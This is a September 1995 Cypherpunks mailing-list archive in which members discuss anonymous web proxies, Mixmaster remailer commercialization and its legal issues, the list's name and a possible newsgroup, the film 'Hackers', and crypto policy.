 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sun, 17 Sep 95 03:11:09 PDT
To: Aleph One <aleph1@dfw.net>
Subject: Re: Anonymous WWW proxies
In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr>
Message-ID: <9509171010.AA11011@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Aleph One writes:
 > Whats the problem of using CERN in proxy mode? You can even set it up do 
 > to chaining.
The chaining is not dynamic (but its is maybe patcheable) ? 
I don't think there is support for encryption (ssl patches maybe?) ?
Also, CERN httpd is a huge thing, maybe some smaller proxy would
do... 
My development is/could be based on my httpd, but simplified... I'll
have a look at standalone already existing proxies before reinventing
the wheel...


Regards
dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sun, 17 Sep 95 03:17:15 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: Anonymous WWW proxies
In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr>
Message-ID: <9509171016.AA11022@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Christian Wettergren writes:
 > |  + Chaining would be a imo good idea (ie cli <-> anonproxy1 <->
 > |    anonproxy2 <-> ... <-> server) but how would you manage to tell
 > |    your favorite web browser to add in its header something like
 > |    Http-Proxy-List: anonproxy2, ...
 > |    An alternative would be to have a database of avaibale (running)
 > |    proxies and that the proxy itself randomly choose a next route ?

 > Doesn't most of the browsers support a "firewall-proxy-mode", where
 > all queries are sent of to a special daemon, that forwards the query
 > on. This would probably be the place to add the header-munging.
yes, they support one level of proxying, but not several as far as I
know (so chaining must be done by the proxy itself as I suggested
below)

 > How do you plan to get the reverse-path working? Having a
 > encrypted/chained return path in the request?
Reverse path is not a problem because WWW works with a bidirectional
connection, so you get the answer to you query on the same path as you
send it (its client <-> proxy1 ... (<-> and not ->))

Regards
dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 17 Sep 95 12:25:41 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster Licensing Offer Explained
Message-ID: <ac81c0b51f0210042c27@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I've trimmed the mailing lists I'm not on...)

At 8:01 AM 9/17/95, Lance Cottrell wrote:

> Permission is granted to distribute this document in any media for any
>purpose as long as the entire document is distributed with the attached
>digital signature intact, or the document is clearly marked as having been
>modified with the locations of deleted text indicated.

So sue me. :-}

(That is, I'll treat this article in the normal way, trimming sections I'm
not responding to and making note of elisions only where I think it
important to.)

...
>The company offering to license Mixmaster is Phoenix DataNet, a Houston
>area ISP. John Perry, a person well known to this list and the remailer
>community in general, is a Senior Systems Administrator at Phoenix.
>
>On Thursday I received a call from John. Some others at Phoenix had just
>noticed a Mixmaster remailer he had been running on one of their machines.
>Phoenix has several large corporate customers who need secure transactions
>for some special applications. The core engine of Mixmaster is well suited
>to that purpose. They offered to license the code from me to use as the
>framework on which to build these other programs. In the process they will
>rewrite many basic functions in Mixmaster that need major overhaul (e.g.,
>key management). We will incorporate those improvements back into
>Mixmaster. This should lead to porting Mixmaster to several other
>platforms, and to fixing most of my worst coding atrocities.

First, I think it generally a Good Thing that remailer software gets
commercialized and cleaned-up, or that at least commercial packages exist.
(I'm not going to get into commercial vs. non-commercial and Microsoft vs.
Gnu issues.) If Lance makes a bunch of money off this, more power to him.

However, this commercialization raises some interesting issues. Others have
dealt with various concerns about the code integrity, about features added,
and even about TLA access. I'll address some liability and legal issues.

* Will Phoenix DataNet be making the mix software available for purchase,
or are they funding _internal development_? (That is, mixes for their
corporate clients, which raises some interesting issues in and of itself,
as discussed below.)

* If Phoenix is planning to resell Mixmaster, or whatever they call it (as
"Mixmaster" may remain a trademark of the appliance company which
originated the name), what will be their liability for the various abuses
which are likely to occur? None of the existing remailers/mixes has had
"corporate" backing, and the "deep pockets" corporations are often presumed
to have, so lawsuits have not gone after corporations.

* On the other hand, if Phoenix is primarily aiming at internal use, for
specified corporate customers, how will they stop others from using the
service?

If chaining is used, and absent any special "untraceable postage tokens"
they might issue (as one way to control access), how will the Nth mix in a
chain of M mixes "know" whether an incoming message can be remailed or not?

(Schemes to sign the packets obviously flunk the anonymity test.)

There are many other interesting issues which crop up when Giant
Corporation begins to deploy and use remailers. What if, for example, the
Justice Department claims that Phoenix and its customers are using
remailers for price fixing and collusion? (Just to be clear on this, I
personally have no problems with such collusion....but the Antitrust people
see things differently.)

(To be sure, telephones can and of course have been used to collude.
Partly, wiretaps help here (until voice encryption happens...). But Justice
has gone after airline reservation computer systems which they believe were
used to "signal" price information. Imagine how overjoyed they'll be to see
Phoenix DataNet deploy their system!)

Again, don't confuse my arguing points here with any kind of advocacy of
the Justice Department/Antitrust Division position. I'm only trying to
think out what some of the legal issues will be that face the first
U.S.-domiciled company to actually start selling remailers or to set up a
remailer network for customers.

Interesting times ahead.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sun, 17 Sep 95 12:44:03 PDT
To: Ray Arachelian <sunder@amanda.dorsai.org>
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <9509171945.AA26239@accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Ray Arachelian

And that's where we, the cypherpunks come in, by advocating strong 
cryptographic protocols and tools, we can keep every machine safe from 
intrusion; it's not just Uncle Sam's evil minions that should have total 
privacy; normal citizens need privacy too - the spooks shouldn't be the 
only ones with it.  :-)

This message has been brought to you by the Cypherpunks.  Use only 
Cypherpunks brand software ;-D
................................................

Cypherpunk crypto in every computer in every home.

   <g>

  ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 17 Sep 95 09:58:34 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Commercial Mixmaster
In-Reply-To: <199509170348.XAA06314@bwh.harvard.edu>
Message-ID: <199509171656.MAA27949@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	Its worth noting that the source code to Julf's Penet remailer
> is not public (AFAIK).  People use it becuase they trust Julf, or
> trust people who trust Julf.

Yeah, but remember -- there is very little that Julf's code could do
to "cheat". Julf's system maintains a mapping of users to aliases
anyway, so he has no need to "pervert" the system -- he can do
all the bad things we worry about with it working correctly. We
therefore need not see the code to trust the system, because the only
way that the system is trustworthy is if Julf is trustworthy.

Other systems based on cryptography might not be in this position.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Sun, 17 Sep 95 10:16:06 PDT
To: unicorn@polaris.mindport.net
Subject: Re: CYPHERPUNK considered harmful
Message-ID: <199509171657.MAA26446@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn <unicorn@polaris.mindport.net> wrote:
> On Fri, 15 Sep 1995, David C. Lambert wrote:
>
> > BTW, I'm not for changing the name of the list, but I do see the logic
> > in a more establishment-friendly name to use when lobbying the public.
> 
> Distrubute [sic] watered down cypherpunk "teachings" in more benign forms which 
> hide their true (Ohhh! Scary!) potential in an effort to make them commonly 
> acceptable to joe sixpack.

I believe you misstate the point that people are trying to make.

I haven't seen anyone advocating the "watering down" of any so-called
"teachings" to "hide" any "true potential".  The only thing that people
have mentioned is that some of the less clueful out there have a knee
jerk response to the name "cypherpunk".  That's all.

> Can't we all see what road this leads down?

No.  Please enlighten us.

> At the risk of politicizing the issue, I wouldn't be the first to call this 
> "left-speak" or "term-sanitizing."

And this matters because...?

> Really the core issue is that the citizens of their respective nations 
> need to either:
> 
> 1>  See cryptography for the important individual rights issue that it
> is and latch on to the basic desire for free and unmonitored commerce and 
> exchange without censorship or observation.
> 
> or
> 
> 2>  Decide that they are not interested in the issues because these 
> issues are too radical, or simply because their own political ideas
> fall left (or statist) of this spectrum.

What exactly is it that you feel "the citizens of their respective
nations" are doing right now, if not this?

> in the end I 
> don't care if every joe sixpack on the planet uses real crypto, just so
> long as those I am to conduct commerce (of data or goods) with do.

If this is the case, then I'm at a loss to understand how you fail to see
the merit in a "term-sanitizing", as you put it, in order to make the use
of strong crypto desired and required by Joe Sixpack.  How do you expect
the legality of string crypto to survive unless Joe and his friends exert
political pressure to keep it alive?  Isn't it obvious that unless this
happens, that strong (unescrowed) crypto is on the path to being outlawed
(at least in the US, and several other countries)?

> The final judgement will be in the advantage of velocity and security of 
> transactions and the wealth that this "allocates" to those wise enough to 
> adopt crypto exchange systems.  Evolution in action.  If this makes me 
> elitist, so be it.

Elitist or not, this is beside the point.  People are bringing up political
and rhetorical concerns because they feel that political and persuasive
methods are required *right now* in order to preserve the *legality* of 
strong crypto.  I only care about whether Joe Sixpack wants strong crypto
because if I can't persuade him that he does, he won't help me keep it
legal in my country of residence.  Once it's legality seems safe(r) from
attack, he can go on using rot13 for all I care.


David C. Lambert
dcl@panix.com
(finger for PGP public key)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFxSiapplsfgM88VAQGj5wQAoY2FQe0rh0InWF1xOmST91QDCy4TrYUj
Y6Vnu/i3yspS/vDsKLMbIYAezAJEtgOPHEOf7Rv1Y4gKDyZNAJbYESXiYTQXD7O3
SNWNtb9nAT6l1RPqsnFR9yWAWYQ1CS3dLRpNpMBIqzL/HnKyKrgitLKQ530XtF8O
78u6jtmsBa4=
=Jgoe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 17 Sep 95 13:20:14 PDT
To: cypherpunks
Subject: Intellectual Property and Crypto collision
Message-ID: <9509172020.AA23349@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> ELECTRONIC MEDIA PROTECTED UNDER COPYRIGHT LAW
> A presidential task force has recommended that electronic transmission of
> books, magazine articles and software should be classified as copies
> subject to existing copyright laws.   The task force also recommended that
> it should be illegal to make or distribute products aimed at decoding
> encrypted software without the consent of the copyright owner. 

Would this make it illegal to produce tools for decrypting key-escrowed
software?   :-)

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sun, 17 Sep 95 10:33:38 PDT
To: Steven Levy <steven@echonyc.com>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509162002.A11836-0100000@echonyc>
Message-ID: <Pine.SUN.3.91.950917132658.21182B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Sep 1995, Steven Levy wrote:

> 
> >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> >is curiosity." 
> 
> It may not be a crime, but it's not nice to steal a title.
> 

Well, it IS kinda a common word these days.  The Beatles and Madonna both 
have a song called "Rain" -- this doesn't mean madonna stole it, does it?

Jon	
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 17 Sep 95 05:37:01 PDT
To: roy@cybrspc.mn.org
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <950916.115448.5Q5.rnr.w165w@cybrspc.mn.org>
Message-ID: <18742.9509171235@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Roy Silvernail <roy@cybrspc.mn.org> writes:
> In list.cypherpunks, aba@dcs.exeter.ac.uk writes:
> > One thing I have been thinking would be nice would be a USENET
> > newsgroup, as mailing lists are a step away from easy access which
> > some people never make.
> 
> That's a feature, not a bug.  Unless the group was moderated, I predict
> the S/N ratio to be <= 0.  Witness the crap in alt.2600.

I think you misunderstand what I was saying, I wasn't saying *instead
of*, but *as well as*, and with a different purpose, just a comment on
Peter's post as to creating *another* group / list with a different
purpose, one to specifically further his ideas on transferring
technology to more people.

> The mailing list, as someone said before me, works as a limited
> pre-screening system.  Given the nature of the list's focus and
> discussion, I think a newsgroup would end up being a stable
> attractor for the clue-deficit crowd.  Not something I'd find
> useful.

So I most definately agree with the likely effects of for instance
merging the list and a newsgroup with a mail to news gateway, as
someone suggested, this would be a really bad idea, and would open the
list to a flood of junk.

If a group such as say alt.cypherpunks were created, it would be just
yet another group which hosts endless directionless arguments with
David Sternlight, etc. via huge cross posting.

Perhaps it would be better to just post crypto FAQs to existing crypto
groups, to further use of crypto.

A later suggestion someone else had was of a read-only mailing list
mirror in a newsgroup.  I'm not sure about this, I mean yes it would
allow more people to casually read, and this is what I use Todd
Masco's nntp.hks.net nntp server for, and find it a really nice way to
read, much nicer than a mail box, even if it was slower for me.  Of
course there are software solutions which allow you to set up similar
effects your self, but as a standard read-only newsgroup, I think it
would likely increase readership.  But I'm not sure, I mean even that
is likely to get the list some more junk, as it will less of a barrier
to post, I mean all you have to do is send to cypherpunks@toad.com,
after all, and it wouldn't take a lot to figure that out.

Undecided as to whether a read only newsgroup in mail.cypherpunks or
something would be a good idea or not.  I'm sure it already happens a
lot of places, so perhaps it won't make a lot of difference.

But I definately wasn't advocating gating an alt group to cpunks and
vice-versa.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 17 Sep 95 14:22:45 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful
Message-ID: <199509172122.OAA00733@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>I haven't seen anyone advocating the "watering down" of any so-called
>"teachings" to "hide" any "true potential".  The only thing that people
>have mentioned is that some of the less clueful out there have a knee
>jerk response to the name "cypherpunk".  That's all.

At least early on, back when we were getting our 15 kilobytes of fame
on the front covers of WiReD and the NYT magazine section, the name
appeared to be useful for getting attention; Tim and Eric were getting
occasional quotes in the mundane press, as was John Gilmore who has
had longer-term relationships with some of the press through his
other activities.  Maybe the NYT isn't the paragon of respectability
that it once was.....
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 17 Sep 95 14:40:32 PDT
To: cypherpunks@toad.com
Subject: "Attachments"
Message-ID: <ac81e3df200210046fa3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Why do people keep sending "attachments"?

This was just a text article, and not an application (program), so why was
it included as an "attachment"?

At 8:27 PM 9/17/95, Michael Shields wrote:
>Attachment converted: Macintosh HD:cypherpunks as a newsgroup (????/----)
>(00005C4E)

The message was, as Microsoft Word 6.0 saw it:

-----BEGIN PGP SIGNED MESSAGE-----

The general opinion seems to be that the netnews format is very
convenient, though we should keep the list; but that entering Usenet or
Altnet would lower the S/N.

Why not, then, start a new hierarchy?  Why not gate cypherpunks not to
alt.cypherpunks or comp.security.cypherpunks, but to crypto.cypherpunks?
We could feed it freely between us and set up NNTP servers which are
open for just crypto.*.  c.c would be the only crypto.* group for now,
but it would also be easy to add more -- say, for the "respectable"
splinter group, or for protocol WGs.  We'd get the convenience of netnews
without the high profile.

I'm willing to run the gateway on news.tembel.org and feed other sites,
if people think crypto.cypherpunks is a good idea.  Opinions?
- --
Shields.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFyEm+yjYMb1RsVfAQF1YQQAneg8c6yUKJUUybqepl52yqyS53OGrpLq
YfdrMYaIxMWdWKNpMAAus/g8WjWMwYrrB4p+8/WLMm4HsUEHO2ouNzbraiyMRwaB
NEhf0v/91h9jGniZIX5uQyqSdM/VC5YupWV0cITqKte9iLZR77C5hVqXBiLhRcwG
YL8GwDP5tYw=
=roIF
-----END PGP SIGNATURE-----

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 17 Sep 95 15:01:34 PDT
To: cypherpunks@toad.com
Subject: Re: Commercial Mixmaster
Message-ID: <ac81e66b21021004091d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:34 PM 9/17/95, hallam@w3.org wrote:

>I seem to remember that Julf took over Stephie's code from Wizvax which
>used to
>post into the alt.sex.bondage group. I suspect he has modified it since but I
>don't think that there is much to it.

Actually, it was the code of Karl Kleinpaste that Julf took over...I seem
to recall Julf saying this in an article. In any case, this is what Karl
claimed last year:

"There are 3 sites out there which have my software: anon.penet.fi, tygra,
and uiuc.edu.  I have philosophical disagreement with the "universal reach"
policy of anon.penet.fi (whose code is now a long-detached strain from the
original software I gave Julf -- indeed, by now it may be a complete
rewrite, I simply don't know); ....Very bluntly, having tried to run anon
servers twice, and having had both go down due to actual legal
difficulties, I don't trust people with them any more."
[Karl_Kleinpaste@cs.cmu.edu, alt.privacy.anon-server, 1994-08-29]


>How does the cypherpunks remailer work? Does PGP encrypt the signature of a
>message so that the identity of the sender is unknown? Or is it simply PEM
>style
>encryption so that the DN of the sender is in the clear :-(

Assuming this is a serious question and not a troll, cypherpunks remailers
(at least the ones I have used) completely encapsulate a message. No stuff
"dangles outside" the remailed part.

When PGP encryption is used, nothing is outside the block. If Alice sends
something to Bob's Remailer, Bob decrypts the message and may or may not
find further encrypted blocks inside. Envelopes within envelopes.

I can't imagine it being done any other way. (I'm not counting the
remailers possibly signing the sent messages, as a way of protecting
against tampering, but this reveals nothing about the senders.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sun, 17 Sep 95 13:39:22 PDT
To: cypherpunks@toad.com
Subject: Re: Commercial Mixmaster
In-Reply-To: <199509170513.AA06296@ideath.goldenbear.com>
Message-ID: <9509172034.AA07230@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:

>	Its worth noting that the source code to Julf's Penet remailer
> is not public (AFAIK).  People use it becuase they trust Julf, or
> trust people who trust Julf.

I seem to remember that Julf took over Stephie's code from Wizvax which used to 
post into the alt.sex.bondage group. I suspect he has modified it since but I 
don't think that there is much to it. 

Even if Julf released some code there would be no way ofknowing that it was the 
code he runs except by compromising the anonymity of the service itself. In any 
case it is clear that the confidentiality of the service relies entirely on the 
trustworthyness of Julf and the security of the lines into Julfs server. I 
accept the former but can't believe for a moment that every spook and his aunt 
doesn't have a tap on the latter.


How does the cypherpunks remailer work? Does PGP encrypt the signature of a 
message so that the identity of the sender is unknown? Or is it simply PEM style 
encryption so that the DN of the sender is in the clear :-(

I
		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 17 Sep 95 13:53:27 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <199509170217.WAA10568@clark.net>
Message-ID: <Pine.D-G.3.91.950917165319.7821D-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Sep 1995, Ray Cromwell wrote:

> > 
> > >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> > >is curiosity." 
> > 
> > It may not be a crime, but it's not nice to steal a title.
> 
>  I think there's a high probability of someone independently inventing
> the title "hackers" for this movie rather than steal it. It's not
> very original. Besides, the content of your book has very little
> to do with this movie. The movie would be more appropriately
> titled "crackers" or "phreakers"
> 
> -Ray
>  
> 
> 

Or maybe Bruce Sterling should object.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Sun, 17 Sep 95 17:18:40 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <Pine.SUN.3.91.950917184519.17849D-100000@polaris.mindport.net>
Message-ID: <199509180014.RAA00341@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Sun, 17 Sep 1995, Black Unicorn wrote:
> 
> So if you are so intouch with Joe Sixpack, what does he think?  Do you 
> have some evidence to suggest that there is any widespread awareness of 
> the issues among Joe and Jane?  Surveys?  Studies?  Anything?
> 
> Go out on the street and ask 10 random people.  Hell, ask 10 
> intellectuals not in the computer science field.  I think your level of 
> disillusion will approach mine, and if not, then I do not give your 
> powers of observation much credit.
> 
Actually, I think it's even worse than that.

I dropped by the weekly 'meeting' of the Cal Poly SLO Computer Club (OK,
these are the locally notorious slo.punks, and the meeting is more of a
social get together than anything) last Monday night.  I was interested
in getting people's reactions to having a large number of people's 
anon.penet IDs publicly posted.  What I found was kind of scary.

No one was aware of the existence of any other remailers than anon.penet.

Everyone assumed that the University is logging all mail to anon.penet, and
no one particularly cared.

One woman asked me why she should use PGP when it could be so quickly broken.
Turns out (I am NOT making this up) she didn't know the difference between
PGP and ROT_13!

Knowledge of security was limited to the technical details of setting up
systems such as Kerberos and firewalls and not using your SSN for a password.
No one had any idea of the algorithms involved, or which ones are truly
secure and which ones can be easily broken.  Etc.

These are all undergraduates in the process of getting BSCS degrees.

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NSCEE@aurora.nscee.edu
Date: Sun, 17 Sep 95 17:16:34 PDT
To: cypherpunks@toad.com
Subject: Re: FAX Encryption Software
In-Reply-To: <43hun9$n2b@news1.deltanet.com>
Message-ID: <9509180016.AA26906@aurora.nscee.edu>
MIME-Version: 1.0
Content-Type: text/plain



FYI: This was posted to a slew of Usenet newsgroups. Unless I've
missed something, which "CRYPTO-STRONG" package has ever been
"licensed" by the "U.S. Department of Commerce"? 

Does anybody have more info on this product or the good folks
behind it? 

=====================================================================
Originally posted by: clav@deltanet.com

>ANYONE FOR A CRYPTO-STRONG, YET EASY TO USE FAX/EMAIL SECURITY 
>SOFTWARE PACKAGE FOR BUSINESS OR OTHER USE???
>
>Aliroo Ltd. has developed a Windows, eye-to-eye fax/email 
>encryption package called PrivaSoft.
>
>Unlike any previously devised system, this method protects, with 
>only 4 mouse clicks, fax and email transmissions in electronic 
>and even paper form - FROM THE TIME YOU CREATE A MESSAGE UNTIL IT 
>IS READ - NOT JUST WHEN YOUR FAX IS BEING TRANSMITTED. 
>
>You can encrypt a message, and then fax or email it (via plain 
>old standard fax machine or fax modem), print it to paper or save 
>to a disk file.
>
>It is fully licensed, without restriction for export, by the U.S. 
>Department of Commerce. NO PGP WORRIES.
>
>Email me for a free copy which will be sent to you via email or 
>snail mail post. It is fully functional (not crippleware) and 
>enables you to try our system out before purchase with 8 free 
>page scrambles. It retails for $130 per installed computer. 
>Looking for end users and distributors.
>
>Thanks,
>David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 17 Sep 95 15:39:01 PDT
To: Greg Broiles <greg@ideath.goldenbear.com>
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <199509162015.AA03916@ideath.goldenbear.com>
Message-ID: <Pine.SUN.3.91.950917183137.17849B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 16 Sep 1995, Greg Broiles wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Black Unicorn writes:
> > Some months ago I called for advanced stego and stealth PGP as well as 
> > larger keys in the event we all had to go "into the crypto closet" for a 
> > time.
> 
> > I call for them again.
> 
> I know of three ways to get software:
> 
> 1. Write it yourself.

I've admitted before I program as well as a carp.  (No, not Mr. Carp)

> 2. Pay someone else to write it.

I don't think that e.g., a stealth PGP would demand much of a fee, or 
that such a fee would make many of the people involved in the various\
 intellectual rights of the program happy.

I might add that I don't want the software for myself, I want it for the 
effect it will have on potential legislation/enforcement.

If some other 'punks want to get together and fund such projects, I will 
participate.  However, putting the burden of financing this venture 
(which will have no immediate economic return, as I will support no 
venture which does not result in fully public software) entirely on my 
shoulders just because I happen to believe it will soon be necessary to 
maintain any strong crypto ability, is unrealistic, and I believe you 
know it.

> 3. Find software someone else wrote that meets your needs.

I'm working on 3, I don't believe it exists.

> If (3) isn't working, perhaps you should try (1) or (2). 
> 
> (I've been "calling for" a big house with a hot tub for years now.
> Still no progress. I'll let you know if it works out.)


Cute, but that's about all.


> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMFswPX3YhjZY3fMNAQHatwP/ZJKuNEDRPdCldyvshGkG/w/io+37zx3m
> DyJ4h1+OicxYCtKbolXYVcX8C4d1j7hXY2sesepcDvYYyy+butdQ+/2tw3u0FW1j
> WpfCGURpypBVb5T7QlL21Qv39cBIu9mJxkasPkQSeSnrC24eGtoItmZzrIRZgJyj
> Dj2FOIfxiFY=
> =5DwJ
> -----END PGP SIGNATURE-----
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Sep 95 10:02:12 PDT
To: hallam@w3.org
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <9509170429.AA05221@zorch.w3.org>
Message-ID: <Pine.D-G.3.91.950917183710.11501B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Sep 1995 hallam@w3.org wrote:

> 
> >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> >is curiosity." 
> 
> I know companies who have spent millions cleaning up after a hacker breakin. 
> I've been up at two in the morning trying to stop a person with known mental 
> problems breaking into a site with some very dangerous computer controlled 
> machinery. I've dealt with people trying to get rich quick by defrauding others. 
> I've met some real evil bastards who simply want to ruin as many other peoples 
> lives as they possibly can, including people that thought they were their 
> friends.
> 
> To me teenagers who break into computer systems are not funny at all, its like 
> joyriding, its funny until someone gets hurt. I know people who have got hurt 
> real bad.
> 
> I like having privacy, part of the cost of that privacy is respecting the 
> privacy of others.
> 
> 	Phill
> 

Phill obviously presents one point of view, vigorously and well.  What do 
the rest of you think about a teen who, say, busts into a .edu site, 
plays with the files, and ultimately brings the system down entirely for 
36 hours?  Fun and games?  Send him to his room, sans modem? Prosecute 
him?  Have a TLA hire him???

Not an easy answer for me for "mere trespass," but as damage mounts, it 
becomes easier. 

I'll try to post later tonight on my prior key escrow question.

EBD



Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 17 Sep 95 15:40:51 PDT
To: "S. Keeling" <keelings@wu1.wl.aecl.ca>
Subject: Re: WAS_tem (fwd)
In-Reply-To: <9509162012.AA29482@wu1.wl.aecl.ca>
Message-ID: <Pine.SUN.3.91.950917184021.17849C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 16 Sep 1995, S. Keeling wrote:

> Incoming from Rev. Ben:
> > 
> > On Thu, 14 Sep 1995, James A. Donald wrote:
> > 
> > > If you draw a picture using paintbrush of an underage person engaging
> > > in sexual conduct, you are in violation of this proposed legislation.
> > 
> > Doesn't that directly contradict the stated purpose of existing child 
> [snip]
> > 
> > Do the lawyers on the list want to pipe up?

The current child pornography laws are entirely misguided and poorly written.

> -- 
> 
>  "Remember, obsolescence (Win95) isn't an accident;  it's an art form!" 
>    keelings@wu1.wl.aecl.ca       s. keeling,   aecl - whiteshell labs
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
